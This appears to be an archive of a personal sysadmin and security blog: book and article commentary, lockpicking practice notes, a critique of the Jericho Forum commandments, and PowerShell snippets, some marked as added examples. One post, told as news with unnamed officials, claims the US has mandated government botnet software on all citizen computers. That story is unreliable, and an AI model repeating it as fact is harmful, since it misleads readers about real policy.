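    Putting the two halves of the post together (create the config file if it is missing, then add a server whether or not the parent already has children) looks like this. It is an added example rather than the post's own script; $xpath and the element names follow the post, and Add-ServerEntry is a hypothetical helper name.

```powershell
# Added example (not the post's script): create the config file when it is
# missing, then add a <server> entry whether or not <serverlist> already has
# children. $xpath and the element names follow the post; Add-ServerEntry is
# a hypothetical helper name.
function Add-ServerEntry {
    param(
        [Parameter(Mandatory)] [string] $xpath,
        [Parameter(Mandatory)] [string] $ServerName
    )

    # XmlDocument.Save resolves relative paths against the process's working
    # directory, not PowerShell's current location, so resolve the path first.
    $fullPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($xpath)

    if (-not (Test-Path -LiteralPath $fullPath)) {
        # No config yet: write a skeleton with an empty <serverlist>.
        $skeleton = New-Object System.Xml.XmlDocument
        $root = $skeleton.AppendChild($skeleton.CreateElement("installcontrol"))
        $root.AppendChild($skeleton.CreateElement("serverlist")) | Out-Null
        $skeleton.Save($fullPath)
    }

    # Cast to [xml]: Get-Content alone returns strings, which have no CreateElement.
    [xml]$xmlFile = Get-Content -Raw -LiteralPath $fullPath

    # Dot notation ($xmlFile.installcontrol.serverlist) hands back a [string]
    # (the inner text) when an element has no element children, and a string
    # has no AppendChild. The indexer always returns the XmlElement itself, or
    # $null if it is absent, so it works for empty and populated parents alike.
    # DocumentElement is the <installcontrol> element, whatever it contains.
    $root = $xmlFile.DocumentElement
    $serverList = $root["serverlist"]
    if ($null -eq $serverList) {
        $serverList = $root.AppendChild($xmlFile.CreateElement("serverlist"))
    }

    $objNewServer     = $xmlFile.CreateElement("server")
    $objNewServerName = $xmlFile.CreateElement("servername")
    $objNewServerName.InnerText = $ServerName
    $objNewServer.AppendChild($objNewServerName) | Out-Null
    $serverList.AppendChild($objNewServer) | Out-Null

    $xmlFile.Save($fullPath)
}

# Constructed demo on a temp file: the first call hits an empty <serverlist>,
# the second a populated one, and both must succeed.
$demo = Join-Path ([System.IO.Path]::GetTempPath()) "installcontrol-demo.xml"
Remove-Item -LiteralPath $demo -ErrorAction SilentlyContinue
Add-ServerEntry -xpath $demo -ServerName "DANTOOINE"
Add-ServerEntry -xpath $demo -ServerName "KASHYYYK"
([xml](Get-Content -Raw -LiteralPath $demo)).installcontrol.serverlist.server | ForEach-Object { $_.servername }
```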
    .: the practice of system and network administration
    Upon recommendation in the Security Catalyst Forums, I picked up a copy of The Practice of System and Network Administration by Thomas Limoncelli, et al.

    So far I am impressed by the book. This is an ideal book to give any manager or beginner/intermediate SA/NA. It stays technical, but so far all of the advice is very general and common sense for any IT shop. Do automation, do this, don't do this, this is why this is a bad idea, these are universal steps to get yourself out of the hole...

    There are moments of mangled sentences and some of the topics seem a bit dated (Windows NT...) but this is so far a book I think I'd like to see on the shelf of any manager (or SA team library) I might have for the foreseeable future. It may not tell you how to automate deployments of Windows XP workstations, for example, but it will give you the reasons why this is a good idea and approaches to take to get shit done.

    It is also nice to see some things I've learned on my own to be echoed in this book, validating my own common sense and reinforcing confidence. Despite being a big book (over 1000 pages), it can be read in chunks and is an easy read nonetheless.
    .: survival of the fittest...or the most economical
    Ahh, summer's beginning to give up her fight [1], portending my favorite season, Autumn! I've also been busy at work and at play, which has limited my posting energy. Not only that, but holy crap have some of my feeds been posting a ton the past couple weeks! It is tiring trying to keep up with them, or even to scroll through the articles I don't care to read.

    Today's news comes from Marcin who reviews the question of going with a series of best of breed solutions or all-in-one security packages? You'll almost certainly have cost and support benefits from an all-in-one solution, but it may still have small gaps, and certainly tends to be weaker in some areas, if not weaker than the whole of a series of best of breeds put together.

    What I would choose is as good in the best of breed as I can afford in time and money based on my company size. As a techie, I'd much prefer best of breed over all-in-one behemoths. I tend to find best of breeds to be more trustworthy and much more surgical in their approaches. In a way, that illustrates a comparison. Would you prefer a specialized surgeon to perform operation X, or a more commoditized but affordable provider? What about for a routine operation? Do you want a common product or something specialized? Agility?

    Compliance promotes this idea as does the maturing of the security industry, but should we really settle for "Good Enough" security? Perhaps that is pragmatic, but I'd still like to think anything I secure is better than the typical Good Enough...

    [1] If you know this song, props to you, you have some taste!
    .: picking more locks
    I've previously mentioned that I'm getting into lockpicking, and I continue to practice in small pieces of spare time. Last week I picked my first non-practice lock, a 5-pin dead bolt in my apartment. Just tonight I sat down to try it again and picked it three times in 6 minutes. I'm a little scared, but happy with my progress!

    I've been able to start to actually feel the various "gives" when a pin is set, as well as the sounds. Sometimes there is a small give in the torque when a pin clears. Sometimes a small click. Sometimes it is the lack of tactile response from the pin when it is set and the spring no longer pushes down on the pick. All of these evidences are getting more and more common. I'm even surprised more and more at how easy raking a lock open can be. Raking involves moving a jagged rake pick in and out of the key way such that several pins quickly set, as opposed to picking the pins one by one. Insert torque, slide in a rake pick, and before I've even completed two "rakes" the lock is open. I've done that a few times much to my surprise. If you know what bumping is, raking is smack in the middle of the spectrum between bumping and pin-by-pin picking.

    Sunday evening I watched War in the theater and for the first third of the movie and through the previews had a lock and pick in my hands just opening it over and over, while not trying to create a pattern of it. I don't want to unlock my locks just because I follow the same pattern each time, but rather to open them through actual semi-conscious effort.

    So far it has been working, and is quite a nice little idle activity. I might move up to my cut out spool pin lock this week. You can see a picture of a spool pin towards the bottom of this really interesting page on lockpicking. This page looks like something nice to read. I especially enjoyed skimming down to the part about unset/unbinding pins and the various states, plus how they feel so as to identify the state.
    .: the ghosts of digital crime
    The Register posted an article about Max Butler being busted again by authorities. Two things about this article.

    1) As if we don't need more awareness of wireless insecurity...oh wait, obviously we do. Max would go to hotels and intercept wireless communications. Hello there, ripe opportunities!

    2) In the bootnote, I see, "Some kids think they can't get into trouble for hacking computer systems..." Now, let's look at crime in general, let alone digital crime. I'd be willing to say that people are not so much caught breaking into something as they are caught bragging about it or trying to sell any goods they stole from said breaking or hacking. If I intercept and break into your wireless network from a hotel room, unless I'm stupid and visited my gmail account on your network, you likely aren't going to have anything on me. If I steal your wallet, I'm a ghost. Until I show up at the grocery store and attempt to use that credit card or cash that paycheck you received....

    However, I would say an exception would be when you discover a break-in while it is in progress. A guard seeing someone climb a fence could stop a theft and arrest the intruder. The same might be said about a digital break-in, possibly. But still, a break-in where I actually get away means I'm a ghost.

    I want to brainstorm a moment. The steps of a theft?

    a) Someone decides to commit a crime. Often, crime occurs in a moment of opportunity or desperation. I don't plan to steal someone's wallet, but when I see it just lying there, or that accountant computer sitting unlocked... Or I can't pay my bills and absolutely need money or go homeless... Otherwise, committing a crime typically means overcoming some internal moral compass and disregarding external moral judgements. Many people don't run red lights because that's Just Bad or because other people are watching. Same with many crimes. They don't occur because they are Just Bad. Which is why the first time is the hardest, and repeating offenses are so important to watch. Other than maintaining cultural morals, you can't do much about this. The digital age has largely removed the "people are watching" barrier (the external moral judgements), especially on the Internet. Just ask any child predator.

    b) Someone is breaking in. You have a great chance to catch someone here, or thwart their attempts. Guards, alarms, diligence, logging, monitoring, razorwire, locks.

    c) Someone has broken in and left. This is the ghost stage. Unless they left behind some solid evidence, they're a ghost. Take inventory and try to determine motive or start cleaning up.

    d) Profiting from the crime. This is the next chance to really catch someone when they attempt to sell the goods or do something with their ill-gotten gains. Whether it is bragging or selling credit cards, this is the next tripwire where you can catch someone. Of course, if the goods are not trackable, such as common cash, then you're still out of luck. If I steal your wallet, grab the cash, then burn the rest, you're still out of luck when I buy some 40s with the cash.
    .: the religious ugly of browser choices
    In the workplace, I tend to avoid the common conversations: money, religion, politics, and even sex. These things tend to be wedges between people. People get way too fanatic about some of them, or it becomes a divisive topic. I'm careful about whom I open up to about those things, and where and when.

    Today I clicked to visit a blog site I have in my RSS reader. I clicked through from work and up popped a flat out denial screen because I was using IE as my browser. Now, we make people use IE, but some of us do get to use Firefox when we test or need something new, however I don't make myself a complete standing exception by using IE almost all of the time like every other user. And no, this wasn't just a warning page that let me into the site, but rather a complete, 100% denial of entry.

    Seriously, take your browser and OS religion and put it elsewhere. I don't subscribe to political or religious blogs. And while I sometimes read that particular offending blog, I decided it is not worth giving the author another feed hit, so I unsubscribed.

    I don't mind people saying Firefox is better, or reminding me that I'm on IE through a splash page. In fact, given the option, I'd use Firefox over IE anyway, which I do at home (and with a blank user-agent). But discriminating users with full denial based on browser choice is ridiculous.
    .: reality check from the fark attack
    It is not breaking news that fark.com was the victim/target of a hacking attack. But take a moment to think about this attack. Someone sent spam and spoofed emails to Fark employees. The spoofed emails appeared to be from colleagues. The links contained went to websites hosting trojans and other malware, some of which seems to have stolen and sent out pilfered passwords.

    Think about how your organization would be protected from an attack like this.

    Users don't check email headers, at all. They wouldn't know these messages are spoofed unless there is something obviously wrong or they yell over the cube wall to ask. Should the users even see these emails?

    If one user accidentally clicks the link, will their browser be susceptible? Their OS? Their administrative/user level on the system?

    Would they know something happened and say something? What if they don't, can you run a history search to see who in your company visited those bad sites?

    Will the OS scream bloody hell if a trojan is found? If a trojan is detected by AV but no analysts are around to check the logs, does it do damage?

    There's a lot of breakdowns here that I would not be the least surprised are breakdowns in 95% of companies. And guess what...I bet Fark isn't a Fortune 500 and not a huge employer, and they were still the victim of a targeted attack. And no, I don't think user education is a guarantee of protection.

    As a side note, I think user education is valuable, but I also think it has some dangers. It shouldn't be used to reassign blame, for instance to some user who clicked on a link when they should have known better from their training. That's not productive punishment or assignment of accountability or blame. Likewise, can you detect when they break down? If not, why bother training? If so, then likely you have the technological means to compensate for less user training. I'm not anti-user training, but I am against viewing it as more than an augment to a company's security posture and culture.
    .: technitium mac changer updated
    The free Windows MAC-changer tool, Technitium MAC Address Changer has had a new release. Yeah, so what, it's easy to change a registry key, but we all know that once you know the how and why, you want to do things easy and quick, hence tools like this that automate the mundane. This tool should be up there just under the ranks of Cain and NMap as necessary free tools for Windows.
    .: calling a powershell script from a powershell script
    Doing things in PowerShell is often simple, but finding them out for the first time is sometimes not. This little tidbit took a good half hour of my day. I wanted to call another script from my first script. I didn't mind if I needed to wait for execution to finish before moving on, and I had no requirements to pass variables or any information between scripts. This did the job for me:
    & "d:\scripts\installwebserver.ps1"
    If it can't be done in PowerShell (yet!), there is the option of calling psexec or powershell.exe or cmd.exe directly using Invoke-Expression. MoW talks about calling a process and leveraging the WaitForExit method, which could be useful as well.
    .: wi-spy and chanalyzer updated
    MetaGeek has recently updated the Wi-Spy software to Chanalyzer 2.1.6. They also have other software for the Mac updated. Oh, and I see Wi-Spy now has a 2.4 product which has an external antenna and has ballooned in price to $400. Ouch! Still, the original is available and the software works with both.

    I'm not sure the external antenna is worth the price, and at $400, they're really moving out of consumer-land geekery and into a more small office wireless support market. Unless I consult with wireless analysis and site surveys, I don't think any home user will lay down that much money for this tool.
    .: security is not useless
    Read at least the first few paragraphs of this post on 0x000000.com on how security is useless (wish I could remember who maintains that site, since their name isn't apparent). If we're into security or even have a smidgeon of security consciousness in our IT worlds, we've been there. In fact, I think we all need to hit this low point in the rollercoaster of life regularly. Really, that's the point of what we do, right?

    Every time I feel this way about security, I am reminded that skilled attackers are still rare and that security does not have to absolutely protect against them. We need to accept that and be happy with that if we're to continue as an industry or even in our happy lives.

    I like to think of security like herding cats, holding sand, or visualizing wind. These are all difficult, if not impossible tasks to do perfectly. That doesn't mean we do nothing. Security is not black and white, perfect or useless; to believe so means a belief in a silver bullet to achieving a perfect security state. (Think about it for a while and what implications there are which follow certain beliefs.)
    .: war walking the white house on darkreading
    DarkReading has a nice article about war walking near the White House and other DC governmental hubs. This certainly takes a level of moxie to even attempt, as I'm not sure I would even try that.

    A few points to pull out. I like the mention of EV-DO and would love to see more security measures and exposures on this. I wonder if there is a way to jam EV-DO signals within your area, but not disrupt normal cell phone technology, for instance on a corporate campus. I like the mention that people (even consultants whom you think should know better) piggy-back on any sort of open wireless network they can get to, even if it discloses sensitive information. And a nice quote:
    "Later, Rushing shows me how easy it is for a phisher to duplicate one of these internal 'guest' log-in screens and grab all the traffic from an unsuspecting client. 'I'm surprised we don't see more of that.'"
    I'm surprised we don't see more of this either. I think this is simply a bit more difficult for newbies to do, whereas hacking something like WEP has tons of tutorials which can pay off if the newbie is lucky. I like that these topics come up, because while we have this dull buzz in the background about wireless insecurities, it still is nothing more than a dull buzz. A dangerous dull buzz.

    Sadly, this article ends on an off note with the following quote:
    "'Kids are adding to WIGLE all the time -- it's one of the ways you can look cool,' Rushing says. 'The more APs you've mapped, the cooler you are.'"
    If you want to look ignorant and rather retarded, throw a lashout to some useful service and make sure to mention the "kids." Ugh, this was not necessary to an otherwise good article, and really left me thinking that Rushing is just talking out of his ass here.
    .: united states to require "botnet" software on all citizen computers
    In response to a United Press International report that China has amassed a botnet of 750,000 computers located in the US, the US has mandated a 2-year timeline to force all Internet Service Providers (ISPs) and customers of those ISPs to run government-sponsored botnet-like programs on their computers. All US computers could then be called into service in the event the US finds itself in a cyber war, or needs to protect its cyber interests by launching distributed denial-of-service (DDoS) pre-emptive strikes against its enemies.
    A former senior U.S. information security official says there are nearly three-quarter million personal computers in the United States taken over by Chinese hackers.
    An unconfirmed US senator has denounced this situation as unacceptable and requires immediate action by the US military and the Department of Homeland Security.

    US officials hope that by mandating installed software on US citizen-owned computers, they can call up these forces when needed to form the largest and most powerful botnet in the world, and reclaim dominance of cyberspace. These measures were rushed through Congress and the Senate and have been approved for immediate action.

    An anonymous DHS official enthusiastically commented, "Some systems may be put to work cracking password hashes pilfered from enemy systems, while others may scan the Internet for vulnerable enemy systems, and even others can actively be used to attack other systems in the world. Basically, when needed, we could take control of the system in the background, unbeknownst to the user."

    He also added, in concern for ISP cooperation, "ISPs will be forced to require their customers to install our software. They risk losing rights to lines and bandwidth, let alone government penalties, should they not comply."

    The software in question is nearing completion. It is being developed by a software development firm, still a highly secretive organization close to Silicon Valley with ties to Washington, DC, and will run in the background of Windows and Mac systems, with Linux versions planned for the near future. It has been rumored this organization has been working closely with specialists from the Secret Service and NSA.

    The Frontier for Internet Safety is heavily opposing these new revelations from the US government, but so far has had little to officially say until they can view the software. They have also suddenly become the victim of a currently ongoing DDoS, so their site may not be available at this time. The source of the attack is still unknown.
    .: jericho 1 - de-perimeterization and the jericho forum commandments
    Hoff recently struck a banner in the ground defending the Jericho Forum's concept of de-perimeterization (albeit not the FUD version) and their commandments (pdf). I typically respect what Hoff has to say (when I understand the topic!), so I decided to stick my nose a bit deeper into the Jericho Forum's position and commandments while trying to keep an open mind. I might just learn something!

    First in my examination is checking out their front page which explains de-perimeterization. With such a bold placement, this better be the meat of their message; the why and the what. This also turns out to be the place people create first impressions. Let's chunk this a bit.
    today the traditional "firewalled" approach to securing a network boundary is at best flawed, and at worst ineffective. Examples include:

    -business demands that tunnel through perimeters or bypass them altogether
    -IT products that cross the boundary, encapsulating their protocols within Web protocols
    -security exploits that use e-mail and Web to get through the perimeter.
    This is stating the obvious, yup, business demands tunnel through barriers, products tunnel through already-trusted protocols, and there is insecurity inside the contents of those protocols. Nothing new here for anyone who has been in IT at any time in the last 10 years. Besides, isn't this the point of internetworks, to share through barriers?

    Of course, the point of these barriers is to let certain things through and not let others through. Just because a few holes are poked doesn't mean the barrier is useless. If I put doors to my office with a card reader to slow down the press of bodies to get to work in the morning so my guards can keep a visual for suspicious people, should I get rid of those doors because I'm letting people through already? No.

    The Jericho Forum has a point when it tackles tunneling "stuff" through the web protocols which are allowed anyway. I guess we can assume no perimeter devices will deeply inspect packets. But still, I see nothing here that truly suggests the "firewalled" approach is either ineffective or flawed, at least by today's firewall standards.

    IT IS DANGEROUS TO ASSUME THAT A SECURITY MEASURE MUST EITHER BE PERFECT OR IS OTHERWISE USELESS! That is the message I get when they call firewalls ineffective or flawed. This just means you need deeper inspection or layered defenses. It is dangerous to say we have a trend of de-perimeterization just because we allow talk between networks.
    to respond to future business needs, the break-down of the traditional distinctions between “your” network and “ours” is inevitable
    This is pure semantics and means nothing. It's a literary method equivalent to taking a data set in statistics and making it paint a glass half full or glass half empty picture just by playing with the numbers. Besides, I don't think anyone in any company *doesn't* think about "their" network and "everything else." There may be more "other" devices in "my" network these days, and vice versa, but so what? That's not an argument for the disappearing perimeter, per se. It's an argument for more defense in addition to the perimeter.
    increasingly, information will flow between business organizations over shared and third-party networks, so that ultimately the only reliable security strategy is to protect the information itself, rather than the network and the rest of the IT infrastructure
    This is true in a narrow scope, but again, there is still a line that can be drawn between the aforementioned "our network" and the "everything else." This is obvious when speaking about what you own and what you don't own. You can own the lines and cables and gear up to the demarcation for your ISP, at which point the ISP controls the rest. Has this changed and I didn't realize it? Yes, business has to pump data over a third-party (the Internet, duh) and that information should be protected (duh). But that doesn't imply the perimeter is disappearing. Maybe it is disappearing compared to 25 years ago when information stayed inside buildings.

    This statement seems to imply that the only recourse is to protect information. This is great as long as we don't need to ever use that information. Once we open that book that is usually locked in a safe, someone can read over our shoulder, snatch it from our hands, or spill something on it. This is not reality.

    The Jericho Forum says this is the trend of de-perimeterization. No, this is a trend in needing defense in depth (depth as in layers or even depth as in deeper inspection at the perimeters). Sadly, defense in depth is a common phrase, and I think their reason for using a "new" term is entirely PR and marketing and to get noticed. Well, they have! :)

    So let's just assume they still have a valid point, and there is a need. I'll buy that because I think that is true, and I really want to give them the benefit of the doubt. Next, I will take a look at their de-perimeterization solutions, also available on their front page.

    jericho 1 - de-perimeterization and the jericho forum commandments
    jericho 2 - the jericho forum and the de-perimeterization solution
    jericho 3 - the first three commandments: the fundamentals
    jericho 4 - commandments 4 - 8
    jericho 5 - commandments 9-11
    jericho 6 - my conclusions
    .: jericho 2 - the jericho forum and the de-perimeterization solution
    I'm going to continue looking at the Jericho Forum's concept of de-perimeterization (god, that's a bitch to type...) and its commandments. In this "chunk," I'm taking the "de-perimeterization solution" section of their main page.
    While traditional security solutions like network boundary technology will continue to have their roles, we must respond to their limitations. In a fully de-perimeterized network, every component will be independently secure, requiring systems and data protection on multiple levels, using a mixture of:
    I like that they concede that boundary technology will continue to have their roles. They don't stress this enough to address the knee-jerk reaction they get of "oh my god they want us to remove our firewalls!" Sadly, they follow this up with saying every component needs to be independently secure. Ugh...why bother with the first statement, then? Is that network boundary only good for logging now? I think this is a great goal, however, but it should be the juxtaposition of these two ideas: strong boundary with strong systems. This is called defense in depth, which Jericho Forum is seemingly avoiding in exchange for their more dramatic "de-perimeterization" term.
    -encryption
    -inherently-secure computer protocols
    -inherently-secure computer systems
    -data-level authentication
    That first item is good, but it definitely is a fly in being able to monitor your networks. The role of encryption alone is powerful enough to shape the direction of security for the coming 50 years. They have a big point with this, and if it continues, the effect will be a de-perimeterization for deeper level attacks which we just won't be able to decrypt and inspect without each system becoming an island fortress. Yikes!

    The middle two...just make me sigh in bliss. I wish we could do that, but it won't happen. Even things we think are inherently secure today have holes found years from now. This is an ideal, and just won't happen because we're not perfect, but more importantly because it is not economical for most of business. The software and web developer industries are excellent illustrations that there is not enough drive to get things secure up front. The drive is to get things done first, prove that it can make the company money, and later scramble for an SDLC that includes security testing and design near the start. Unless the world turns topsy-turvy in the next 50 years, I just can't see this changing; it's a basic effect of technology, progress, and change.

    I'm not sure what is meant by "data-level authentication." Does this mean the data will inherently authenticate users accessing it? I can only guess at this one. It sounds catchy, but could be just empty speak.
    The design principles that guide the development of such technology solutions are what we call our “Commandments”, which capture the essential requirements for IT security in a de-perimeterized world.
    Great!

    jericho 1 - de-perimeterization and the jericho forum commandments
    jericho 2 - the jericho forum and the de-perimeterization solution
    jericho 3 - the first three commandments: the fundamentals
    jericho 4 - commandments 4 - 8
    jericho 5 - commandments 9-11
    jericho 6 - my conclusions
    .: jericho 3 - the first three commandments: the fundamentals
    As I was talking to a colleague yesterday about the Jericho Forum, someone who didn't know about them, it occurred to me how "European" this approach is. I guess it might be more accurate to say it is not terribly compatible with typical American approaches. In the US, we hold capitalism and competition very dear. So dear, that we typically choose competition over cooperation. The attitude is "I can do it better and make money," as opposed to "what is best?" The Jericho Forum suggestions greatly smack of the latter. For this reason, I'm not sure the US will ever adopt this early, if ever. Great at innovating! Poor at maturing those innovations.

    Moving on to the actual Commandments from the Jericho Forum, I first see they are bookended by some textspeak. This occurs at the beginning:
    The Jericho Forum commandments define both the areas and the principles that must be observed when planning for a de-perimeterized future.
    Whilst building on “good security”, the commandments specifically address those areas of security that are necessary to deliver a de-perimeterized vision.
    The commandments serve as a benchmark by which concepts, solutions, standards and systems can be assessed and measured.
    And this occurs at the end:
    Conclusion
    De-perimeterization has happened, is happening and is inevitable; central protection is decreasing in effectiveness

    - It will happen in your corporate lifetime
    - Therefore you need to plan for it and should have a roadmap of how to get there
    - The Jericho Forum has generic roadmap to assist in the planning
    First, the Jericho Forum hasn't led me to conclude these things. Second, I understand this is not a holistic roadmap to security, but rather a security framework intended to address de-perimeterization. That's a slight cop-out, but ok, I'm willing to accept this.

    So, here are the first three commandments, grouped as the Fundamentals.
    The scope and level of protection should be specific & appropriate to the asset at risk

    - Business demands that security enables business agility and is cost effective
    - Whereas boundary firewalls may continue to provide basic network protection, individual systems and data will need to be capable of protecting themselves
    - In general, it’s easier to protect an asset the closer protection is provided
    The commandment itself is sound, and an extremely common business theme. Same as the first bullet point. I can agree with these outright. The second bullet point, however, gets back to my current non-acceptance of their hypothesis, and as such I'm predictably cautious. I don't know that data should be capable of protecting itself. Since this is tied to the hypothesis, I'll skip it for now. The last bullet point is also dubious. I counter that it is easier to protect assets close when you have a) few assets or b) strong centralized administration of those security controls. But wait...that appears counter to de-centralizing everything. Oops! I'd rather not manage 4000 laptops individually like so many isolated islands. This bullet point is a big step back.
    Security mechanisms must be pervasive, simple, scalable & easy to manage

    - Unnecessary complexity is a threat to good security
    - Coherent security principles are required which span all tiers of the architecture
    - Security mechanisms must scale; from small objects to large objects
    - To be both simple and scalable, interoperable security “building blocks” need to be capable of being combined to provide the required security mechanisms
    This second commandment is another no-brainer, although sometimes non-scalable solutions are fine for a company that is not intending to grow out of the solution scale in the lifetime of that solution. Enterprise-level solutions don't necessarily apply to small companies. The other three descriptors are obvious and I do like the commandment itself.

    The first bullet point is something that is not mentioned enough, and too often is mentioned as a baseball bat to get your way of doing things. It's a largely non-actionable topic, but it really does matter. Complexity means fewer people understand what is going on, flaws can occur in the middle of all that complexity, it is not agile, often not scalable, and so on. Sadly, "complex" is a relative term which no one agrees upon except in general principle. The second bullet point says the same thing only inversely: keep things easy to understand. Well, yeah, hopefully!

    The third bullet point is part of my minor quibble on this commandment. I don't think everything must scale. This is determined by the company. If this is meant as a framework for the whole world, then yes, I sure would hope solutions are scalable.

    The fourth bullet is one I'd love to hear more about as I think I can read it many different ways. Building blocks...like simple components which together form a secure puzzle? Does that affect complexity? Does each building block need to not only be functional but also secure as part of the inherently secure protocols and such? This almost sounds like a "feel good" bullet point that really means nothing and therefore cannot be addressed at all.
    Assume context at your peril

    - Security solutions designed for one environment may not be transferable to work in another. Thus it is important to understand the limitations of any security solution
    - Problems, limitations and issues can come from a variety of sources, including geographic, legal, technical, acceptability of risk, etc.
    - Surviving in a hostile world
    The first bullet point on this third commandment seems to address my concern above, about solutions being different for different organizations. Likewise, homegrown apps or ways of putting things together in one environment, may not be transferable directly to some other network. That's fine, but doesn't that undercut needing scalability and simplicity? I guess this gets down to, "Is security a commodity product or a customized service?" By having a framework for everyone, I would also follow that with this describing a commodity product. The second bullet supports the first.

    The third bullet...eh? I think someone needs to reword that. This commandment and the third bullet mean little alone.

    Of note, I really like what "Assume context at your own risk," says to me. It reminds me of things I see on mailing lists repeatedly. A vague security question gets answered by 10 people 10 different ways, all of which make assumptions or contextual decisions without really properly asking questions or answering the actual question. Things are different everywhere, and we must not assume it is all the same, but instead interrogate stakeholders. Oddly, I don't get the bullet points for this.

    jericho 1 - de-perimeterization and the jericho forum commandments
    jericho 2 - the jericho forum and the de-perimeterization solution
    jericho 3 - the first three commandments: the fundamentals
    jericho 4 - commandments 4 - 8
    jericho 5 - commandments 9-11
    jericho 6 - my conclusions
    .: starting a powershell script with arguments from another script
    I previously figured out how to start a PowerShell script from within another script. My next requirement was to start another script that required a variable. This took some trial and error to figure out the arguments need to be outside the quotes.
    & "d:\scripts\installwebserver.ps1" SERVERNAME
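    As an added example (not from the original post), here is what the called script's side of that arrangement can look like, plus the caller. The contents of installwebserver.ps1 are hypothetical; the post only shows the invocation line. The param() block on the callee is what makes SERVERNAME bind to a named parameter, and validating it there keeps a malformed value from being passed further down into install commands.

```powershell
# --- d:\scripts\installwebserver.ps1 (hypothetical contents of the called script) ---
# param() must be the first statement in the script file.
param(
    [Parameter(Mandatory = $true, Position = 0)]
    [ValidatePattern('^[A-Za-z0-9-]{1,15}$')]   # accept only a plain NetBIOS-style host name
    [string]$ServerName,

    [Parameter(Position = 1)]
    [ValidateRange(1, 65535)]
    [int]$Port = 80
)

Write-Host "Installing web server role on $ServerName (port $Port)"
# ... the real install work would go here ...

# Return a non-zero exit code on failure so the caller can react to it.
if ($ServerName -eq 'BADHOST') { exit 1 }
exit 0

# --- d:\scripts\caller.ps1 (hypothetical calling script) ---
# Positional argument, outside the quotes, exactly as in the post:
& "d:\scripts\installwebserver.ps1" SERVERNAME

# Named arguments do not depend on position and read more clearly:
& "d:\scripts\installwebserver.ps1" -ServerName SERVERNAME -Port 8080

# Arguments kept in a hashtable and passed by splatting:
$installArgs = @{ ServerName = 'WEB01'; Port = 8080 }
& "d:\scripts\installwebserver.ps1" @installArgs

# $LASTEXITCODE carries the called script's exit status back to the caller.
if ($LASTEXITCODE -ne 0) {
    Write-Warning "installwebserver.ps1 failed with exit code $LASTEXITCODE"
}
```

    The two file sections are separated by comments only so they fit in one listing; in practice they are two files. Quoting the script path and leaving the arguments outside the quotes is what the post worked out by trial and error; the named and splatted forms are the same call with the binding made explicit.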
    .: curphey on the art of scoping application security reviews
    Mark Curphey has begun a series of posts about scoping application security reviews. Part 1 talks about the business of application security reviews. Part 2 talks about the types of testing. They're good reads, and I'm looking forward to the other parts.
    .: jericho 4 - commandments 4 - 8
    Jericho...commandments...yeah, I can see the searches that drag people here now...great. I'm continuing my look at the commandments from the Jericho Forum. This is commandment 4 which bears the header, Surviving in a Hostile World.
    Devices and applications must communicate using open, secure protocols

    - Security through obscurity is a flawed assumption - secure protocols demand open peer review to provide robust assessment and thus wide acceptance and use
    - The security requirements of confidentiality, integrity and availability (reliability) should be assessed and built in to protocols as appropriate, not added-on
    - Encrypted encapsulation should only be used when appropriate and does not solve everything
    Oh boy! We hit some tender spots here! I think the assumption about using open protocols is that the more open something is the more secure. I guess if you fully believe in a strict interpretation of the first bullet point, this makes sense. But I find it a dubious claim to accept across the board. They have a point about things being open. Take Skype for instance. I dislike Skype because I have no idea what their encryption consists of because it is not open. Still, I can accept this commandment as part of an ideal framework, but I don't think that reflects reality.

    I don't like bullet 1 at all. Security through obscurity is life; deal with it. Security through obscurity alone is not security. That's the proper usage of that phrase. Utilizing obscurity can reduce your risk. Changing the SSH server port to TCP 23412 will lower your risk, but true, it won't increase the inherent security of the SSH server itself. So strictly speaking, I don't buy this bullet point. Also, there are times where if we opened up a protocol to peer review and acceptance, we'll spend 25 years over-analyzing and trying to provide a consensus, and then look back at the bloated monster of a protocol that results. Yikes.

    The second bullet makes me think what we're hoping for are god-like tentacles of protocols on the Internet. I just don't think that is going to work. We need simple, small, extensible protocols. They should be solid, scalable, and work well. Confidential? I don't quite buy that...and I'm interested in security. Take the simple building blocks and secure them. I don't know what bullet three is referring to, so I'll skip that one.
    All devices must be capable of maintaining their security policy on an untrusted network

    - A “security policy” defines the rules with regard to the protection of the asset
    - Rules must be complete with respect to an arbitrary context
    - Any implementation must be capable of surviving on the raw Internet, e.g., will not break on any input
    Again, I get the feeling we're striving for a framework no one can attain. That's not a good goal. This commandment sounds good on one hand, but one bullet and one implication make this taste bitter.

    First, I agree that devices need to maintain their security when away from the nest. My caveat comes when a security policy needs to be updated or changed. What then? Does this not mean a digital form of sneakernet or centralized management? This makes me feel like our devices all need to be like H3 Hummers; tanks driving around the big bad roadways. Ugh.

    The first two bullets are no-brainers. The third bullet sounds nice, until that last little bit. Will not break on any input. Well, that's great. Again, a nice ideal, but trying to build perfect devices and security by using imperfect people is a stretch for me.

    Next, I'm blocking commandments 6-8 into one section since they seem to cover similar ground.
    All people, processes, technology must have declared and transparent levels of trust for any transaction to take place

    - Trust in this context is establishing understanding between contracting parties to conduct a transaction and the obligations this assigns on each party involved
    - Trust models must encompass people/organisations and devices/infrastructure
    - Trust level may vary by location, transaction type, user role and transactional risk

    Mutual trust assurance levels must be determinable

    - Devices and users must be capable of appropriate levels of (mutual) authentication for accessing systems and data
    - Authentication and authorisation frameworks must support the trust model

    Authentication, authorisation and accountability must interoperate / exchange outside of your locus / area of control

    - People/systems must be able to manage permissions of resources and rights of users they don't control
    - There must be capability of trusting an organisation, which can authenticate individuals or groups, thus eliminating the need to create separate identities
    - In principle, only one instance of person / system / identity may exist, but privacy necessitates the support for multiple instances, or one instance with multiple facets
    - Systems must be able to pass on security credentials /assertions
    - Multiple loci (areas) of control must be supported
    I'm not really sure how to take these three commandments. It sounds like it would be satisfied with a global identification and trust system. That would certainly be fairly perimeterless! But that will never happen, especially in the US. In fact, it is that third bullet, about having trust levels varying, that makes me still believe there are perimeters. When a trust level changes, that's where you put some access control. Network access control. Anyway, I can't be too dogged on these three commandments since I don't fully get it.

    So what we have so far is very heart-warming, feel-good idealistic goals for a global infrastructure (extrastructure?) utilizing perfect or near perfect protocols and devices that can withstand anything. Sorry, but what the fuck...?

    jericho 1 - de-perimeterization and the jericho forum commandments
    jericho 2 - the jericho forum and the de-perimeterization solution
    jericho 3 - the first three commandments: the fundamentals
    jericho 4 - commandments 4 - 8
    jericho 5 - commandments 9-11
    jericho 6 - my conclusions
    .: sending emails with powershell
    Sending emails with PowerShell is pretty straightforward. Emails can be sent either by default through a normal SMTP server or they can be dumped into a local instance of IIS to be picked up and delivered. Both can be useful depending on the situation.

